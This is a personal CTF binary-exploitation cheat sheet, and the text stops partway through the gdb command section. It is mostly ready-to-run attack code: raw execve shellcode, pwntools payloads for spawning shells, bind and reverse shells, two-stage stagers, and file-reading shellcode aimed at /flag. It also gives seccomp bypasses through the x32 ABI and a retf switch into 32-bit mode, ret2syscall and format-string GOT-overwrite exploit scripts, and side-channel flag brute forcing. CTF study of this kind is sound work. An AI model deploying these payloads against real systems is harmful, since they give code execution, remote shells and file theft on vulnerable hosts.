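Handy notes that may come in useful (updated irregularly)

My own everyday reference notes; new material gets added from time to time.

General-purpose shellcode

32-bit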

from pwn import *
context(arch='i386', os='linux', log_level='debug')
p = process('./pwn_binary')   # placeholder path; swap in remote(host, port) for a remote target
shellcode_32 = b"\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
# [Tip] pwntools can generate an equivalent payload automatically:
# shellcode_32 = asm(shellcraft.sh())
payload = shellcode_32
p.sendline(payload)
p.interactive()

64-bit

from pwn import *
context(arch='amd64', os='linux', log_level='debug')
p = process('./pwn_binary')   # placeholder path
# p = remote('192.168.1.100', 1337)
shellcode_64 = b"\x50\x48\x31\xd2\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05"
# [Tip] In practice, if you would rather not memorize these bytes, pwntools can generate a shell payload in one call:
# shellcode_64 = asm(shellcraft.sh())
payload = shellcode_64
p.sendline(payload)
p.interactive()

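Note: this amd64 payload is very short, but it never sets rsi explicitly, and it also relies on rax being 0 on entry (push rax supplies the string terminator, and mov al only sets the low byte). For a more robust version, see the supplementary 27-byte variant below.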

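Shellcode tricks (supplement)

Quick notes on the general approach

Check the registers and the stack right before control reaches the shellcode; if a usable address is already there, do not rebuild it yourself
Usual order of preference for zeroing a register: xor reg, reg / push 0; pop reg / xchg / cdq (cdq zeroes edx only when eax is non-negative)
lea rsp, [rip] helps when rsp is unusable but you need a temporary region that behaves like a stack
The return value of read lands in rax/eax and can be used directly as the next syscall number
When space is too tight, build a two-stage read first and feed the real payload in afterwards
When output is closed, fall back to a side channel: guess memory, guess the flag, or infer from whether the process crashes
In some challenges ds/fs/gs or lea reg, [rip] hands you an address near code, heap, or stack for free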

Starting `SROP` directly from the `read` return value

For example, on amd64, making read return exactly 0xf sets rax to the rt_sigreturn syscall number.

from pwn import *
context(arch='amd64', os='linux', log_level='debug')
asm_code = shellcraft.read(0, 'rsp', 0xf)
asm_code += 'syscall\n'
print(asm_code)
shellcode = asm(asm_code)
print(disasm(shellcode))
payload = shellcode
p = process('./pwn_binary')   # placeholder target
p.send(payload)
# Second send: exactly 15 bytes, so that read returns 0xf

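Notes:

This trick is typically used to kick off SROP
If seccomp blacklists rt_sigreturn, do not take this route

When almost every register is `0`, get one `syscall` for free

Do not give up just because nearly every register is 0. On amd64, if rax/rdi/rsi/rdx... are all 0 and you execute one syscall, the usual effect is a read(0, NULL, 0) call, after which rcx holds the address of the next instruction. It is not a main-line technique, but in severely constrained shellcode it can sometimes hand you a code address for free.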

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

asm_code = '''
    xor eax, eax
    xor edi, edi
    xor esi, esi
    xor edx, edx
    syscall
'''

shellcode = asm(asm_code)
print(shellcode.hex())
print(disasm(shellcode))

# What you typically observe:
# 1. The call executed is read(0, NULL, 0)
# 2. rcx is set to the address of the instruction after syscall
# 3. r11 is set to the rflags value at that moment

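Limited byte set / self-writing `stager`

If the challenge limits not the length but the number of distinct byte values allowed in the input, or even forbids the second input from reusing byte values from the first, do not try to squeeze in a full ORW. A more practical approach is to write a stager from a tiny byte set that generates the real payload at run time inside an RWX region. Checkers generally scan only the bytes you send, not the syscall, /flag, or full ORW that your code writes at run time.

The minimal skeleton to remember is "write one byte, advance, then jump back and execute":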

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

asm_code = '''
    add al, 1
    mov byte ptr [rdx+rcx], al
    inc ecx
    jmp rdx
'''

shellcode = asm(asm_code)
print(shellcode.hex())
print(disasm(shellcode))

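# This is only the skeleton of a code writer:
# 1. rdx points at the RWX region first
# 2. rcx is the offset
# 3. al is adjusted to the target byte, then stored
# 4. finally jump back and run the freshly written payload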
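The writer skeleton above walks `al` up to each target byte before storing it. As a rough planning aid, the sketch below (plain Python, with a hypothetical helper name `plan_increments`) computes how many `add al, 1` steps are needed before each store, assuming `al` starts at a known value and wraps modulo 256. It is an illustration of the bookkeeping, not a full encoder.

```python
def plan_increments(payload, start_al=0):
    """Return, per target byte, how many `add al, 1` steps precede its store."""
    steps = []
    al = start_al & 0xff
    for b in payload:
        steps.append((b - al) & 0xff)  # al wraps modulo 256
        al = b
    return steps

# Example: the two bytes of the `syscall` instruction (0f 05)
syscall_steps = plan_increments(b"\x0f\x05")
print(syscall_steps)
```

Sorting the bytes you need by value, or writing them out of order with a different offset in rcx, reduces the total number of steps.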

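When the first stage is too short, read a second stage and jump to it

If the first stage is too short, the most reliable option is still to read a second stage first: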

from pwn import *
context(arch='amd64', os='linux', log_level='debug')

asm_code = shellcraft.read(0, 'rsp', 0x400)
asm_code += 'jmp rsp\n'
print(asm_code)

# The first stage only reads the second stage onto the stack and then jumps to it

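Side-channel brute force of memory / the flag

When brute-forcing memory or the flag through a side channel, the usual pattern is "hang on a correct guess, crash on a wrong one":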

from pwn import *
context(arch='amd64', os='linux', log_level='debug')

context.binary = elf = ELF('./pwn')

TARGET_ADDR = 0x404040   # change to the address you want to probe

def build_probe(addr, guess):
    asm_code = f'''
        mov rdi, {addr}
        cmp byte ptr [rdi], {guess}
        je ok
        ud2
    ok:
        jmp ok
    '''
    return asm(asm_code)

def probe_byte(addr, guess):
    io = process('./pwn')
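    # For a remote target use instead:
    # io = remote('host', 1337)

    shellcode = build_probe(addr, guess)
    print(disasm(shellcode))

    # Adapt this to how the challenge actually takes input;
    # the default here is "send the shellcode as-is and have it executed"
    io.send(shellcode)

    # Right guess: the program spins in the infinite loop
    # Wrong guess: ud2 executes, normally SIGILL / an immediate crash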
    sleep(0.2)
    alive = io.poll(block=False) is None
    io.close()
    return alive

for guess in range(0x20, 0x7f):
    if probe_byte(TARGET_ADDR, guess):
        log.success(f'byte maybe = {guess:#x} ({chr(guess)})')
        break

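Reminders:

mov rdi, {addr} loads the address you want to probe into rdi
cmp byte ptr [rdi], {guess} compares the single byte at that address
ud2 deliberately raises an illegal-instruction fault, turning a wrong guess into an immediate crash
jmp ok deliberately spins forever, turning a correct guess into "still alive after the timeout"
If the challenge does not take raw shellcode, replace io.send(shellcode) with your actual overflow/jump payload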
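The probe above recovers a single byte. Extending it to a whole string is just a loop over positions; the sketch below shows that loop in plain Python with a stand-in oracle so it can be dry-run offline. The names `recover_string` and `fake_oracle` are hypothetical; on a real target the oracle would wrap something like `probe_byte(TARGET_ADDR + idx, guess)`.

```python
import string

def recover_string(oracle, max_len=64, alphabet=string.printable.strip()):
    """Recover bytes one position at a time; oracle(idx, guess) is True on a correct guess."""
    out = bytearray()
    for idx in range(max_len):
        for ch in alphabet.encode():
            if oracle(idx, ch):
                out.append(ch)
                break
        else:
            break  # no candidate matched: end of string or a non-printable byte
        if out.endswith(b"}"):
            break  # typical flag terminator
    return bytes(out)

# Stand-in oracle for a dry run; replace with a wrapper around the real probe
secret = b"flag{demo}"
fake_oracle = lambda idx, guess: idx < len(secret) and secret[idx] == guess
recovered = recover_string(fake_oracle)
print(recovered)
```

Each oracle call costs one process launch or one connection, so trying likely characters first (lowercase letters, digits, braces) saves a lot of time.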

ORW / file-reading shellcode

ORW = open + read + write, a very common way to get the flag in CTFs.

To see exactly what shellcraft generates, do this:

from pwn import *
context(arch='amd64', os='linux', log_level='debug')
asm_code = shellcraft.open('/flag', 0)
asm_code += shellcraft.read('rax', 'rsp', 0x50)
asm_code += shellcraft.write(1, 'rsp', 0x50)
print(asm_code)
shellcode = asm(asm_code)
print(disasm(shellcode))
payload = shellcode
p.send(payload)
p.interactive()

amd64 / x64

Least effort: cat('/flag'), which is open + sendfile under the hood, 53 bytes

from pwn import *
context(arch='amd64', os='linux', log_level='debug')
asm_code = shellcraft.cat('/flag')
print(asm_code)
shellcode = asm(asm_code)
print(disasm(shellcode))
payload = shellcode
p.sendline(payload)
p.interactive()

More general: readfile('/flag', 1), which does not depend on sendfile, 76 bytes

from pwn import *
context(arch='amd64', os='linux', log_level='debug')
asm_code = shellcraft.readfile('/flag', 1)
print(asm_code)
shellcode = asm(asm_code)
print(disasm(shellcode))
payload = shellcode
p.sendline(payload)
p.interactive()

Classic ORW: open + read + write, 64 bytes

from pwn import *
context(arch='amd64', os='linux', log_level='debug')
asm_code = shellcraft.open('/flag', 0)
asm_code += shellcraft.read('rax', 'rsp', 0x50)
asm_code += shellcraft.write(1, 'rsp', 0x50)
print(asm_code)
shellcode = asm(asm_code)
print(disasm(shellcode))
payload = shellcode
p.sendline(payload)
p.interactive()

openat variant: for when open is banned but openat is still allowed, 71 bytes

from pwn import *
context(arch='amd64', os='linux', log_level='debug')
AT_FDCWD = -100
asm_code = shellcraft.openat(AT_FDCWD, '/flag', 0, 0)
asm_code += shellcraft.read('rax', 'rsp', 0x50)
asm_code += shellcraft.write(1, 'rsp', 0x50)
print(asm_code)
shellcode = asm(asm_code)
print(disasm(shellcode))
payload = shellcode
p.sendline(payload)
p.interactive()

Dynamic-path version: read the path from stdin first, then ORW, 51 bytes plus the path you send

from pwn import *
context(arch='amd64', os='linux', log_level='debug')
asm_code = shellcraft.read(0, 'rsp', 0x20)
asm_code += shellcraft.open('rsp', 0, 0)
asm_code += shellcraft.read('rax', 'rsp', 0x50)
asm_code += shellcraft.write(1, 'rsp', 0x50)
print(asm_code)
shellcode = asm(asm_code)
print(disasm(shellcode))
p.send(shellcode)
sleep(0.1)
p.send(b'/flag\x00')
p.interactive()

x86 / i386

Least effort: cat('/flag'), which is open + sendfile under the hood, 35 bytes

from pwn import *
context(arch='i386', os='linux', log_level='debug')
asm_code = shellcraft.cat('/flag')
print(asm_code)
shellcode = asm(asm_code)
print(disasm(shellcode))
payload = shellcode
p.sendline(payload)
p.interactive()

More general: readfile('/flag', 1), 47 bytes

from pwn import *
context(arch='i386', os='linux', log_level='debug')
asm_code = shellcraft.readfile('/flag', 1)
print(asm_code)
shellcode = asm(asm_code)
print(disasm(shellcode))
payload = shellcode
p.sendline(payload)
p.interactive()

Classic ORW: 43 bytes

from pwn import *
context(arch='i386', os='linux', log_level='debug')
asm_code = shellcraft.open('/flag', 0, 0)
asm_code += shellcraft.read('eax', 'esp', 0x50)
asm_code += shellcraft.write(1, 'esp', 0x50)
print(asm_code)
shellcode = asm(asm_code)
print(disasm(shellcode))
payload = shellcode
p.sendline(payload)
p.interactive()

Dynamic-path version: 48 bytes plus the path you send

from pwn import *
context(arch='i386', os='linux', log_level='debug')
asm_code = shellcraft.read(0, 'esp', 0x20)
asm_code += shellcraft.open('esp', 0, 0)
asm_code += shellcraft.read('eax', 'esp', 0x50)
asm_code += shellcraft.write(1, 'esp', 0x50)
print(asm_code)
shellcode = asm(asm_code)
print(disasm(shellcode))
p.send(shellcode)
sleep(0.1)
p.send(b'/flag\x00')
p.interactive()

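When the length is known, cat2 also works:

amd64: asm_code = shellcraft.cat2('/flag', 1, 0x40), about 65 bytes
i386: asm_code = shellcraft.cat2('/flag', 1, 0x40), about 42 bytes

ORW reminders:

cat() goes through sendfile, so do not use it when the challenge bans sendfile
readfile() is more general but usually longer than cat()
For the dynamic-path version, send b'/flag\x00' without a trailing newline
Using rsp/esp as the buffer overwrites stack contents; if your ROP chain still has to keep running, prefer a bss address
For seccomp challenges, check which syscalls are filtered first, then decide which combination of open/openat/read/write/sendfile to use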

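Quick notes for pwn on other architectures

For non-x86/x64 challenges, do not rush to copy an exploit; get these points clear first:

Architecture and endianness: arm/armel/aarch64/mips/mipsel/riscv64
Syscall convention: which register holds the syscall number and which registers carry arguments
Calling mode: ARM/Thumb, MIPS endianness, ecall on riscv64
Local debugging chain: qemu-user, gdb-multiarch, the matching libc/ld.so

Common conventions at a glance:

ARM32 (EABI): arguments in r0-r6 (most calls only need r0-r2), syscall number in r7, svc 0
AArch64: arguments in x0-x5, syscall number in x8, svc 0
MIPS (o32): arguments in a0-a3, syscall number in v0, syscall
RISC-V: arguments in a0-a5, syscall number in a7, ecall

A few easy-to-forget pitfalls:

When switching between ARM and Thumb, the lowest bit of an address that targets Thumb code usually has to be set to 1
On MIPS, confirm big or little endian first; many remote targets are mipsel
On MIPS, the common call site is jalr $t9
On AArch64, file-reading shellcode usually goes straight through openat (the architecture has no plain open syscall)

Common commands for launching the program locally: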

qemu-arm -L ./rootfs ./pwn
qemu-aarch64 -L ./rootfs ./pwn
qemu-mipsel -L ./rootfs ./pwn
qemu-riscv64 -L ./rootfs ./pwn
gdb-multiarch ./pwn

The most convenient way to launch it from pwntools:

from pwn import *

# AArch64
p = process(['qemu-aarch64', '-L', './rootfs', './pwn'])

# ARM
# p = process(['qemu-arm', '-L', './rootfs', './pwn'])

# MIPS little-endian
# p = process(['qemu-mipsel', '-L', './rootfs', './pwn'])

# RISC-V
# p = process(['qemu-riscv64', '-L', './rootfs', './pwn'])

Network shells / stagers

amd64 bind shell, 128 bytes

from pwn import *
context(arch='amd64', os='linux', log_level='debug')
asm_code = shellcraft.bindsh(9999, 'ipv4')
print(asm_code)
shellcode = asm(asm_code)
print(disasm(shellcode))
payload = shellcode
p.sendline(payload)
p.interactive()

amd64 reverse shell, 118 bytes (after connect() the connected socket is in rbp)

from pwn import *
context(arch='amd64', os='linux', log_level='debug')
asm_code = shellcraft.connect('127.0.0.1', 9999, 'ipv4')
asm_code += shellcraft.dupsh('rbp')
print(asm_code)
shellcode = asm(asm_code)
print(disasm(shellcode))
payload = shellcode
p.sendline(payload)
p.interactive()

i386 reverse shell, 118 bytes (after connect() the connected socket is in edx)

from pwn import *
context(arch='i386', os='linux', log_level='debug')
asm_code = shellcraft.connect('127.0.0.1', 9999, 'ipv4')
asm_code += shellcraft.dupsh('edx')
print(asm_code)
shellcode = asm(asm_code)
print(disasm(shellcode))
payload = shellcode
p.sendline(payload)
p.interactive()

Two-stage stager: the first send carries only a very short read + jmp, the second feeds in the full shellcode

amd64, 15 bytes

from pwn import *
context(arch='amd64', os='linux', log_level='debug')
asm_code = shellcraft.read(0, 'rsp', 0x400)
asm_code += 'jmp rsp\n'
print(asm_code)
shellcode = asm(asm_code)
print(disasm(shellcode))
p.send(shellcode)
sleep(0.1)
stage2_shellcode = asm(shellcraft.sh())   # example second stage; swap in whatever payload you need
p.send(stage2_shellcode)
p.interactive()

i386, 15 bytes

from pwn import *
context(arch='i386', os='linux', log_level='debug')
asm_code = shellcraft.read(0, 'esp', 0x400)
asm_code += 'jmp esp\n'
print(asm_code)
shellcode = asm(asm_code)
print(disasm(shellcode))
p.send(shellcode)
sleep(0.1)
stage2_shellcode = asm(shellcraft.sh())   # example second stage; swap in whatever payload you need
p.send(stage2_shellcode)
p.interactive()

Restricted characters and sandbox notes

Printable / alphanumeric shellcode:

alpha3: works for x86/x64; you have to specify the base-address register

python ./ALPHA3.py x64 ascii mixedcase rax --input="shellcode"
./shellcode_x64.sh rax
./shellcode_x86.sh eax

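AE64: a printable-character encoder for amd64 that also works well; keep it at hand alongside alpha3
If the character set is tighter still, with only some letters/digits left, the idea is to enumerate the usable instruction fragments first and then assemble the target instructions with xor/add
If only two or three characters are allowed, or only a small ASCII / digit range, it still comes down to enumerating what the bytes can decode to, then assembling the target shellcode according to the execution address and context
In the extreme case, x86_64 shellcode can be encoded with just three distinct characters; the essence is still "enumerate fragments -> combine -> self-modify/decode"

A small script for enumerating usable instruction fragments: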

import itertools
from pwn import *

context.arch = 'amd64'
alphabet = '0123456789:;<=>?@'

for n in range(1, 4):
    for seq in itertools.product(alphabet, repeat=n):
        ins = disasm(''.join(seq).encode())
        if not any(x in ins for x in ('.byte', 'rex', 'ds', 'bad', 'ss')):
            print(ins)

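Multi-architecture shellcode:

Some challenges require one payload to run on x86/x64/arm/arm64/mips at once
The usual idea is a polyglot dispatch: make architecture A's jmp/branch decode as a nop or harmless bytes on architecture B
In practice stage0 handles the dispatch, followed by a separate stage1 for each architecture
Keywords worth remembering: xarch_shellcode, polyshell
These challenges are closer to hand assembly than to a one-shot shellcraft.sh()

seccomp / sandbox bypass notes:

When open is banned, check openat first
When read/write are banned, check readv/writev next
When execve is banned, think of ORW or execveat first, or read in a second stage
If the filter does not check for ARCH_X86_64, consider switching to 32-bit mode with retf, or calling int 0x80 directly
If the filter does not reject A >= 0x40000000, try the x32 ABI (0x40000000 + X) on older kernels
If io_uring is not blocked, it is worth a look on recent kernels; it is not a routine path, but occasionally one syscall can do a lot

read through the x32 ABI (old kernels only; do not count on it on Linux 5.16+)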

xor eax, eax
add eax, 0x40000000
xor edi, edi
mov rsi, rsp
mov edx, 0x300
syscall
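The `0x40000000 + X` rule holds for syscalls that are shared between the 64-bit and x32 tables, such as read. A few syscalls have separate x32-only numbers in the 512+ range. The sketch below is a small lookup helper; the dictionaries are a hand-picked subset whose values are assumed from the kernel's syscall_64.tbl, so verify them against your target kernel before relying on them.

```python
X32_SYSCALL_BIT = 0x40000000

# amd64 numbers for syscalls marked "common" (shared by 64-bit and x32)
COMMON = {"read": 0, "write": 1, "open": 2, "openat": 257}
# x32-only numbers (assumed from syscall_64.tbl; partial list)
X32_ONLY = {"readv": 515, "writev": 516, "execve": 520}

def x32_number(name):
    """Return the value to load into eax for an x32-ABI call of the named syscall."""
    nr = X32_ONLY.get(name, COMMON.get(name))
    if nr is None:
        raise KeyError(name)
    return X32_SYSCALL_BIT | nr

print(hex(x32_number("read")), hex(x32_number("execve")))
```

This matters for filters that compare the syscall number with `==` against 59: the x32 execve does not reuse 59, so a naive denylist misses it.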

Common template for switching from 64-bit to 32-bit with retf:

mov eax, 0x23
mov dword ptr [rsp+4], eax
mov eax, 0x400800      ; 32-bit code entry point
mov dword ptr [rsp], eax
retf
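The template above builds the far-return frame in place on the stack. When the frame is delivered through a ROP chain or an overflow instead, the same eight bytes can be packed on the Python side. A minimal sketch, assuming the usual x86-64 Linux user-mode selectors (0x23 for 32-bit code, 0x33 for 64-bit code) and a `retf` without a REX.W prefix; `retf_frame` is a hypothetical helper name.

```python
import struct

CS_32BIT = 0x23   # user-mode 32-bit code segment selector on x86-64 Linux
CS_64BIT = 0x33   # user-mode 64-bit code segment selector

def retf_frame(eip, cs=CS_32BIT):
    """Bytes popped by `retf` with 32-bit operand size: 4-byte EIP, then 4-byte CS."""
    return struct.pack("<II", eip, cs)

frame = retf_frame(0x400800)
print(frame.hex())
```

The 32-bit entry point and the stack both have to sit below 4 GiB, because only the low 32 bits of the addresses survive the mode switch.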

ret2shellcode

from pwn import *
context(arch='amd64', os='linux', log_level='debug')
io = process("./bin")
shellcode = asm(shellcraft.sh())
ret_addr = 0x202011
# Put the shellcode at the front of the buffer, pad, then overwrite the return address
payload = shellcode.ljust(0x68, b"a") + p64(ret_addr)
io.sendline(payload)
io.interactive()

Use vmmap to check whether the buffer is actually executable.

ret2syscall

ROPgadget --binary ./ret2syscall --only "int"
ROPgadget --binary ./ret2syscall --string "/bin/sh"
ROPgadget --binary ./ret2syscall --only "pop|ret" | grep "eax"

Notes:

execve on 32-bit systems (x86 / i386)

On 32-bit Linux a system call is issued with the int 0x80 instruction, and syscall number 11 (0xb in hex) is execve. Arguments are passed in ebx, ecx, edx.

Instruction: int 0x80
eax: 0xb (syscall number 11)
ebx: address of /bin/sh in memory (argument 1, filename)
ecx: 0x0 (argument 2, argv, usually NULL)
edx: 0x0 (argument 3, envp, usually NULL)

int 0x80(eax = 0xb, ebx = /bin/sh_addr, ecx = 0x0, edx = 0x0 )

execve on 64-bit systems (amd64 / x64)

On 64-bit Linux, system calls no longer go through int 0x80 but through the faster syscall instruction. The execve syscall number becomes 59 (0x3b in hex), and the argument registers change as well.

The correct 64-bit setup looks like this:

Instruction: syscall
rax: 59 or 0x3b (syscall number 59)
rdi: address of /bin/sh in memory (argument 1, filename)
rsi: 0x0 (argument 2, argv)
rdx: 0x0 (argument 3, envp)

syscall(rax = 0x3b, rdi = /bin/sh_addr, rsi = 0x0, rdx = 0x0)

from pwn import *
io=process("./ret2syscall")
pop_eax_ret= 0x080bb196
pop_edx_ecx_ebx_ret= 0x0806eb90
bin_sh_addr= 0x080be408
int_80_addr= 0x08049421
payload=b"A"*112+p32(pop_eax_ret)+p32(0xb)+p32(pop_edx_ecx_ebx_ret)+p32(0x0)+p32(0x0)+p32(bin_sh_addr)+p32(int_80_addr)
io.sendline(payload)
io.interactive()

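Format strings

%p: print as a pointer; commonly used to scan the stack
%x / %lx: print as an integer; also usable for scanning the stack
%s: treat the argument as an address and print the string it points to
%c: print one character; usually combined with a width to control output length
%n: write the number of characters output so far to the address the argument points to
%hn: write 2 bytes
%hhn: write 1 byte
%lln: write 8 bytes

Positional arguments matter a lot too:

%6$p: take the 6th argument and print it as a pointer
%10$s: treat the 10th argument as an address and read the string at that address
%7$n: write the current output length to where the 7th argument points

1. Finding the offset

First find which argument position your input lands in.

Common payload:

AAAA.%p.%p.%p.%p.%p.%p.%p

Or, more explicitly:

aaaabbbb.%1$p.%2$p.%3$p.%4$p.%5$p.%6$p

Watch for where one of these appears:

0x61616161 (32-bit; 0x41414141 for the AAAA payload)
or 0x6262626261616161 (64-bit)

2. Information leaks

The most common stack scan:

%p.%p.%p.%p.%p.%p

It may leak:

stack addresses
return addresses
libc addresses
PIE addresses
contents near the canary

Rules of thumb:

Values like 0x7f… are often libc
Values like 0x55… (or 0x56…) are often PIE / the program base
Values like 0x7ff… are often the stack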
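When a scan returns dozens of values, it helps to tag them automatically. The sketch below encodes the rules of thumb above for 48-bit x86-64 user addresses; `classify_leak` is a hypothetical helper, and the labels are only hints. With ASLR disabled under gdb, libc itself is typically mapped around 0x7ffff7..., so it would be tagged as stack here.

```python
def classify_leak(value):
    """Rough guess from the top bits of a 48-bit x86-64 Linux user address."""
    if value >> 36 == 0x7ff:
        return "stack?"
    top_byte = value >> 40
    if top_byte == 0x7f:
        return "libc/mmap?"
    if top_byte in (0x55, 0x56):
        return "PIE or heap?"
    return "unknown"

for leak in (0x7ffd12345678, 0x7f1234567890, 0x555555554000, 0x1):
    print(hex(leak), classify_leak(leak))
```

Always confirm a candidate against vmmap once before hard-coding the offset into an exploit.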

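Arbitrary address read: %s

%s keeps reading until \x00
If the address is not readable, the program crashes

3. Arbitrary write

payload = p32(target) + b"%100c%6$n"

This assumes the offset is 6
It writes 104 to target: the 4 address bytes plus the 100 characters from %100c
The exact value always depends on how many characters were output before %n

4. Controlling the output count

%n writes the total number of characters output so far, so you have to steer that count to the value you want.

%123c

pads the output of that conversion to 123 characters

For example:

addr = 0x0704A06C
payload = p32(addr) + b'%9999c%6$n'

This assumes the offset is 6, so addr is picked up as the 6th argument
%9999c: makes printf output 9999 characters
%6$n: writes the number of characters output so far to the address held in the 6th argument

4 (the bytes of addr) + 9999 = 10003, so 10003 is written to addr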
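The arithmetic above generalizes to "target minus what has already been printed, modulo the write width". A minimal sketch of that calculation in plain Python; `pad_for` is a hypothetical helper name, and a result of 0 means no `%Nc` directive is needed at all.

```python
def pad_for(target, already, width_bits=32):
    """Width N for %Nc so the running output count equals target modulo 2**width_bits."""
    return (target - already) % (1 << width_bits)

print(pad_for(10003, 4))               # 9999, matching the example above
print(pad_for(0x04, 0x85, width_bits=8))
```

Passing `width_bits=8` or `16` gives the wrap-around padding for `%hhn` and `%hn` writes.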

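5. Generating a GOT-overwrite payload quickly with fmtstr_payload

If the target is a 32-bit program with a writable GOT (typically Partial RELRO), a format string can redirect a GOT entry such as exit@got to win. When computing %hhn by hand you have to track both the number of bytes already output and the wrap-around of each byte, which gets tedious very quickly.

For example, overwriting exit@got byte by byte with 0x0804857b: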

from pwn import *

context.log_level = 'debug'
context.arch = 'i386'

sh = process("./pri_32")
elf = ELF("./pri_32")

exit_got = elf.got['exit']
win_addr = 0x0804857b

payload = b"http://"
payload += p32(exit_got) + p32(exit_got + 1) + p32(exit_got + 2) + p32(exit_got + 3)
payload += b"%" + str(0x7b - 13 - 16).encode() + b"c%13$hhn"
payload += b"%" + str(0x85 - 0x7b).encode() + b"c%14$hhn"
payload += b"%" + str(0x104 - 0x85).encode() + b"c%15$hhn"
payload += b"%" + str(0x108 - 0x104).encode() + b"c%16$hhn"

sh.sendline(payload)
sh.interactive()

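The key points:

0x0804857b splits in little-endian order into 7b 85 04 08
%hhn writes only 1 byte, so to write 0x04 the total output count can be raised to 0x104
Likewise, the final 0x08 is written by raising the count to 0x108
In 0x7b - 13 - 16, the 13 is the length of the already printed hello,http:// and the 16 is the length of the 4 addresses; the 13 in %13$hhn is the argument offset, which only happens to be the same number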
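The four padding values in the hand-written payload can be reproduced mechanically. The sketch below is a plain-Python illustration (the helper name `hhn_paddings` is hypothetical): it walks the target value byte by byte in little-endian order and computes each `%c` width modulo 256.

```python
def hhn_paddings(value, already, nbytes=4):
    """Padding widths for successive %c directives when writing value with %hhn, low byte first."""
    pads = []
    count = already
    for i in range(nbytes):
        want = (value >> (8 * i)) & 0xff
        pad = (want - count) % 256   # only the low byte of the count is written
        pads.append(pad)
        count += pad
    return pads

# 13 bytes of "hello,http://" plus 16 bytes of addresses are already printed
print(hhn_paddings(0x0804857b, 13 + 16))   # [94, 10, 127, 4]
```

A padding of 0 would need special handling (drop the `%c` directive entirely), which is one of the details `fmtstr_payload` takes care of.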

In practice, though, it is better to let pwntools generate it:

payload = b"http://" + fmtstr_payload(
    13,
    {exit_got: win_addr},
    numbwritten=len(b"hello,http://"),
    write_size='byte',
)

With positional arguments this shortens to:

payload = b"http://" + fmtstr_payload(13, {exit_got: win_addr}, 13)

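Note: the first 13 is the argument offset and the second 13 is the number of characters already output, i.e. the length of hello,http://. If you change the prefix, what the program prints, or the payload layout, re-verify both the offset and numbwritten.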

ROPgadget / one_gadget / gadget search commands

The most common set of basic checks:

checksec --file=./pwn
file ./pwn
ldd ./pwn
readelf -a ./pwn | grep RELRO
readelf -a ./pwn | grep PIE

Find the most basic gadgets first:

ROPgadget --binary ./pwn --only "ret"
ROPgadget --binary ./pwn --only "pop|ret"
ROPgadget --binary ./pwn --only "syscall|int|sysenter"
ROPgadget --binary ./pwn --only "leave|ret"
ROPgadget --binary ./pwn --only "xchg|ret"

Pinpoint control of the common registers:

ROPgadget --binary ./pwn --only "pop|ret" | grep "rdi"
ROPgadget --binary ./pwn --only "pop|ret" | grep "rsi"
ROPgadget --binary ./pwn --only "pop|ret" | grep "rdx"
ROPgadget --binary ./pwn --only "pop|ret" | grep "rax"
ROPgadget --binary ./pwn --only "pop|ret" | grep "rbp"
ROPgadget --binary ./pwn --only "pop|ret" | grep "rsp"

Control of the common 32-bit registers:

ROPgadget --binary ./pwn --only "pop|ret" | grep "eax"
ROPgadget --binary ./pwn --only "pop|ret" | grep "ebx"
ROPgadget --binary ./pwn --only "pop|ret" | grep "ecx"
ROPgadget --binary ./pwn --only "pop|ret" | grep "edx"

Find jmp/call style control-flow gadgets:

ROPgadget --binary ./pwn --only "jmp|call"
ROPgadget --binary ./pwn --only "jmp|call" | grep "rsp"
ROPgadget --binary ./pwn --only "jmp|call" | grep "rax"
ROPgadget --binary ./pwn --only "jmp|call" | grep "esp"
ROPgadget --binary ./pwn --only "jmp|call" | grep "eax"

Find strings and syscall instructions:

ROPgadget --binary ./pwn --string "/bin/sh"
ROPgadget --binary ./pwn --string "/bin//sh"
ROPgadget --binary ./pwn --string "/flag"
ROPgadget --binary ./pwn --opcode "0f05"
ROPgadget --binary ./pwn --opcode "cd80"

Gadgets commonly used for pivot / SROP / stack migration:

ROPgadget --binary ./pwn --only "leave|ret"
ROPgadget --binary ./pwn --only "mov|ret" | grep "rsp"
ROPgadget --binary ./pwn --only "xchg|ret" | grep "rsp"
ROPgadget --binary ./pwn --only "syscall|ret"
ROPgadget --binary ./pwn --only "syscall"

Find __libc_csu_init / generic argument-control fragments:

objdump -d ./pwn | grep -A40 "__libc_csu_init"
ROPgadget --binary ./pwn --only "pop|mov|call|ret" | grep "r12"

Find gadgets in libc:

ROPgadget --binary ./libc.so.6 --only "ret"
ROPgadget --binary ./libc.so.6 --only "pop|ret" | grep "rdi"
ROPgadget --binary ./libc.so.6 --only "syscall"
ROPgadget --binary ./libc.so.6 --string "/bin/sh"

Common one_gadget commands:

one_gadget ./libc.so.6
one_gadget --raw ./libc.so.6
one_gadget -l 2 ./libc.so.6
one_gadget -l 3 ./libc.so.6

Computing a one_gadget address once the libc base is known:

from pwn import *

libc = ELF('./libc.so.6')
libc.address = 0x7ffff7dc0000

# First look up the offset with one_gadget ./libc.so.6
og = libc.address + 0xe3afe
print(hex(og))

Finding gadgets directly in pwntools:

from pwn import *

context.binary = elf = ELF('./pwn')
rop = ROP(elf)

print('ret        =', rop.find_gadget(['ret']))
print('pop rdi    =', rop.find_gadget(['pop rdi', 'ret']))
print('pop rsi    =', rop.find_gadget(['pop rsi', 'ret']))
print('pop rdx    =', rop.find_gadget(['pop rdx', 'ret']))
print('leave ret  =', rop.find_gadget(['leave', 'ret']))

Common seccomp-tools checks:

seccomp-tools dump ./pwn
seccomp-tools dump ./pwn -- ./pwn
seccomp-tools dump -- ./ld.so --library-path . ./pwn
seccomp-tools asm ./filter.asm
seccomp-tools disasm ./filter.bpf

ldd / patchelf / common local patching commands:

ldd ./pwn
patchelf --print-interpreter ./pwn
patchelf --print-needed ./pwn
patchelf --set-interpreter ./ld-linux-x86-64.so.2 ./pwn
patchelf --replace-needed libc.so.6 ./libc.so.6 ./pwn
patchelf --set-rpath . ./pwn
LD_PRELOAD=./libc.so.6 ./pwn
pwninit --bin ./pwn --libc ./libc.so.6

A set of local checks that gets used a lot in CTFs:

objdump -d ./pwn | grep syscall
objdump -d ./pwn | grep "pop    %rdi"
readelf -a ./pwn | grep fini
readelf -a ./pwn | grep RELRO
strings -a -t x ./pwn | grep "/bin/sh"

GDB / pwndbg common debugging commands

The commands below mix native gdb with common pwndbg commands.

Set the usual options first:

set disassembly-flavor intel
set pagination off
set follow-fork-mode child
set detach-on-fork off

Start / attach:

gdb ./pwn
r
start
attach <pid>

Breakpoints and execution flow:

b *main
b *0x401234
